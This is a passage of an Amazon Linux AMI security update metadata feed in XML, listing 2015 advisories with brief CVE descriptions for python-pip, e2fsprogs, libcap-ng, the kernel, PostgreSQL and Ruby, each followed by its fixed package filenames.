arch="i686"><filename>Packages/libjpeg-turbo-static-1.2.90-5.10.amzn1.i686.rpm</filename></package><package name="turbojpeg-devel" version="1.2.90" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/turbojpeg-devel-1.2.90-5.10.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-devel" version="1.2.90" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-devel-1.2.90-5.10.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-debuginfo" version="1.2.90" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-debuginfo-1.2.90-5.10.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-utils" version="1.2.90" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-utils-1.2.90-5.10.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo" version="1.2.90" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-1.2.90-5.10.amzn1.i686.rpm</filename></package><package name="turbojpeg" version="1.2.90" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/turbojpeg-1.2.90-5.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-541</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-541: medium priority package update for python-pip</title><issued date="2015-06-11 08:08:00" /><updated date="2015-06-11 08:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2296:
A flaw was found in the way python-requests set the domain cookie parameter for certain HTTP responses. A remote attacker could use this flaw to modify a cookie to be sent to an arbitrary URL.
1202904:
CVE-2015-2296 python-requests: session fixation and cookie stealing vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2296" title="" id="CVE-2015-2296" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-pip" version="6.1.1" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-pip-6.1.1-1.20.amzn1.noarch.rpm</filename></package><package name="python27-pip" version="6.1.1" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-pip-6.1.1-1.20.amzn1.noarch.rpm</filename></package><package name="python34-pip" version="6.1.1" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/python34-pip-6.1.1-1.20.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-542</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-542: low priority package update for e2fsprogs</title><issued date="2015-06-16 10:26:00" /><updated date="2015-06-16 11:37:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0247:
A heap-based buffer overflow flaw was found in e2fsprogs. A specially crafted Ext2/3/4 file system could cause an application using the ext2fs library (for example, fsck) to crash or, possibly, execute arbitrary code.
1187032:
CVE-2015-0247 e2fsprogs: ext2fs_open2() missing first_meta_bg boundary check leading to heap buffer overflow (oCERT-015-002)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0247" title="" id="CVE-2015-0247" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcom_err" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcom_err-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-debuginfo" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-debuginfo-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="libcom_err-devel" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcom_err-devel-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-devel" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-devel-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="libss-devel" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libss-devel-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-libs" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-libs-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="libss" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libss-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-static" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-static-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-devel" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-devel-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="libcom_err-devel" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/libcom_err-devel-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="e2fsprogs-static" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-static-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="e2fsprogs-libs" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-libs-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="libcom_err" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/libcom_err-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="e2fsprogs-debuginfo" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-debuginfo-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="libss-devel" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/libss-devel-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="e2fsprogs" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="libss" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/libss-1.42.12-4.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-543</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-543: medium priority package update for libcap-ng</title><issued date="2015-06-16 10:27:00" /><updated date="2015-06-16 11:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3215:
A flaw was found in the way seunshare, a utility for running executables under a different security context, used the capng_lock functionality of the libcap-ng library. The subsequent invocation of suid root binaries that relied on the fact that the setuid() system call, among others, also sets the saved set-user-ID when dropping the binaries' process privileges, could allow a local, unprivileged user to potentially escalate their privileges on the system. Note: the fix for this issue is the kernel part of the overall fix, and introduces the PR_SET_NO_NEW_PRIVS functionality and the related SELinux exec transitions support.
1095855:
CVE-2014-3215 policycoreutils: local privilege escalation via seunshare
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3215" title="" id="CVE-2014-3215" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcap-ng" version="0.7.3" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcap-ng-0.7.3-5.13.amzn1.x86_64.rpm</filename></package><package name="libcap-ng-debuginfo" version="0.7.3" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcap-ng-debuginfo-0.7.3-5.13.amzn1.x86_64.rpm</filename></package><package name="libcap-ng-python" version="0.7.3" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcap-ng-python-0.7.3-5.13.amzn1.x86_64.rpm</filename></package><package name="libcap-ng-devel" version="0.7.3" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcap-ng-devel-0.7.3-5.13.amzn1.x86_64.rpm</filename></package><package name="libcap-ng-utils" version="0.7.3" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcap-ng-utils-0.7.3-5.13.amzn1.x86_64.rpm</filename></package><package name="libcap-ng-utils" version="0.7.3" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libcap-ng-utils-0.7.3-5.13.amzn1.i686.rpm</filename></package><package name="libcap-ng-python" version="0.7.3" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libcap-ng-python-0.7.3-5.13.amzn1.i686.rpm</filename></package><package name="libcap-ng-debuginfo" version="0.7.3" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libcap-ng-debuginfo-0.7.3-5.13.amzn1.i686.rpm</filename></package><package name="libcap-ng" version="0.7.3" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libcap-ng-0.7.3-5.13.amzn1.i686.rpm</filename></package><package name="libcap-ng-devel" version="0.7.3" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libcap-ng-devel-0.7.3-5.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-544</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-544: medium priority package update for kernel</title><issued date="2015-06-16 10:28:00" /><updated date="2015-06-16 11:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3215:
A flaw was found in the way seunshare, a utility for running executables under a different security context, used the capng_lock functionality of the libcap-ng library. The subsequent invocation of suid root binaries that relied on the fact that the setuid() system call, among others, also sets the saved set-user-ID when dropping the binaries' process privileges, could allow a local, unprivileged user to potentially escalate their privileges on the system. Note: the fix for this issue is the kernel part of the overall fix, and introduces the PR_SET_NO_NEW_PRIVS functionality and the related SELinux exec transitions support.
1095855:
CVE-2014-3215 policycoreutils: local privilege escalation via seunshare
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3215" title="" id="CVE-2014-3215" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.44" release="32.39.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.14.44-32.39.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-545</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-545: medium priority package update for postgresql92</title><issued date="2015-06-16 10:29:00" /><updated date="2015-06-16 11:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3165:
Double free vulnerability in PostgreSQL before 9.0.20, 9.1.x before 9.1.16, 9.2.x before 9.2.11, 9.3.x before 9.3.7, and 9.4.x before 9.4.2 allows remote attackers to cause a denial of service (crash) by closing an SSL session at a time when the authentication timeout will expire during the session shutdown sequence.
1221537:
CVE-2015-3165 postgresql: double-free after authentication timeout
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3165" title="" id="CVE-2015-3165" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-contrib" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.13-1.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-546</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-546: medium priority package update for postgresql93</title><issued date="2015-06-16 10:29:00" /><updated date="2015-06-16 11:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3165:
Double free vulnerability in PostgreSQL before 9.0.20, 9.1.x before 9.1.16, 9.2.x before 9.2.11, 9.3.x before 9.3.7, and 9.4.x before 9.4.2 allows remote attackers to cause a denial of service (crash) by closing an SSL session at a time when the authentication timeout will expire during the session shutdown sequence.
1221537:
CVE-2015-3165 postgresql: double-free after authentication timeout
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3165" title="" id="CVE-2015-3165" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-docs" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.9-1.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-547</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-547: medium priority package update for ruby20</title><issued date="2015-06-16 10:30:00" /><updated date="2015-06-18 20:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4020:
Incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.
CVE-2015-3900:
RubyGems did not validate the hostname returned in the SRV record before sending requests to it.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3900" title="" id="CVE-2015-3900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4020" title="" id="CVE-2015-4020" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby20-debuginfo" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.645-1.27.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14-1.27.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.27.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.645-1.27.amzn1.x86_64.rpm</filename></package><package name="ruby20-devel" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.645-1.27.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.645-1.27.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14-1.27.amzn1.noarch.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.27.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.27.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.645-1.27.amzn1.noarch.rpm</filename></package><package name="ruby20-doc" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.645-1.27.amzn1.noarch.rpm</filename></package><package name="ruby20" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.645-1.27.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.645-1.27.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.645-1.27.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.27.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.27.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.645-1.27.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-548</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-548: medium priority package update for ruby21</title><issued date="2015-06-16 10:30:00" /><updated date="2015-06-18 20:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4020:
Incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.
CVE-2015-3900:
RubyGems did not validate the hostname returned in the SRV record before sending requests to it.
